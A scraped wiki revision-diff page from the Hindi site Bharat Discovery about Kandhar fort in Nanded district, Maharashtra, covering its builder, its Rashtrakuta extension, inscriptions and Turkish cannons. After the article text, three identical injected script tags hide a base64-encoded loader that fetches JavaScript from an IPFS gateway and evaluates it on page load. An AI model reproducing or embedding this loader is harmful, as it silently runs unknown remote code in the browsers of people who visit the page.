Difference between revisions of "कंदहार दुर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*कंदहार [[महाराष्ट्र]] राज्य के [[नांदेड ज़िला|नांदेड़ ज़िले]] में स्थित पर कंदहार नरेश सोमदेव का बनाया हुआ प्राचीन दुर्ग है।  
+
[[चित्र:Kandhar-Fort.jpg|thumb|250px|कंदहार दुर्ग, [[नांदेड़]]]]
 +
'''कंदहार दुर्ग''' [[महाराष्ट्र]] राज्य के [[नांदेड ज़िला|नांदेड़ ज़िले]] में स्थित पर कंदहार '''नरेश सोमदेव''' का बनाया हुआ प्राचीन [[दुर्ग]] है।  
 
*[[मलखेड़ कर्नाटक|मालखेड़]] के [[राष्ट्रकूट]] [[कृष्ण तृतीय|नरेश कृष्ण तृतीय]] ने इस दुर्ग का विस्तार करवाया था और कंदहारपुर के स्वामी की उपाधि ग्रहण की थी।  
 
*[[मलखेड़ कर्नाटक|मालखेड़]] के [[राष्ट्रकूट]] [[कृष्ण तृतीय|नरेश कृष्ण तृतीय]] ने इस दुर्ग का विस्तार करवाया था और कंदहारपुर के स्वामी की उपाधि ग्रहण की थी।  
*दुर्ग में [[मुहम्मद बिन तुग़लक़]], इब्राहिम आदिलशाह और [[औरंगज़ेब]] के समय के अभिलेख हैं।  
+
*दुर्ग में [[मुहम्मद बिन तुग़लक़]], इब्राहिम आदिलशाह और [[औरंगज़ेब]] के समय के [[अभिलेख]] हैं।  
 
*अभिलेखों पर उनके निर्माताओं के नाम खुदे हैं।  
 
*अभिलेखों पर उनके निर्माताओं के नाम खुदे हैं।  
 
*जामा-मस्जिद पर इब्राहिम आदिलशाह और निजामशाह के अभिलेख हैं।  
 
*जामा-मस्जिद पर इब्राहिम आदिलशाह और निजामशाह के अभिलेख हैं।  
Line 7: Line 8:
 
*इस दुर्ग के भीतर कई तुर्की तोपें भी रखी हुई हैं।  
 
*इस दुर्ग के भीतर कई तुर्की तोपें भी रखी हुई हैं।  
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 18: Line 18:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
* ऐतिहासिक स्थानावली| विजयेन्द्र कुमार माथुर | वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार, पृष्ठ संख्या - 122
 +
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{महाराष्ट्र के ऐतिहासिक स्थान}}
 
{{महाराष्ट्र के ऐतिहासिक स्थान}}
 
{{भारत के दुर्ग}}
 
{{भारत के दुर्ग}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
 
{{महाराष्ट्र के पर्यटन स्थल}}
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के ऐतिहासिक स्थान]] [[Category:इतिहास कोश]][[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]]
+
[[Category:महाराष्ट्र]][[Category:महाराष्ट्र के ऐतिहासिक स्थान]] [[Category:इतिहास कोश]][[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]] [[Category:ऐतिहासिक स्थानावली]][[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:47, 22 May 2018

[[chitr:Kandhar-Fort.jpg|thumb|250px|kandahar durg, naande d]] kandahar durg maharashtr rajy ke naande d zile mean sthit par kandahar naresh somadev ka banaya hua prachin durg hai.

  • malakhe d ke rashtrakoot naresh krishna tritiy ne is durg ka vistar karavaya tha aur kandaharapur ke svami ki upadhi grahan ki thi.
  • durg mean muhammad bin tugalaq, ibrahim adilashah aur aurangazeb ke samay ke abhilekh haian.
  • abhilekhoan par unake nirmataoan ke nam khude haian.
  • jama-masjid par ibrahim adilashah aur nijamashah ke abhilekh haian.
  • kandahar mean prachin jain evan bauddh mandir bhi haian.
  • is durg ke bhitar kee turki topean bhi rakhi huee haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  • aitihasik sthanavali| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar, prishth sankhya - 122

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>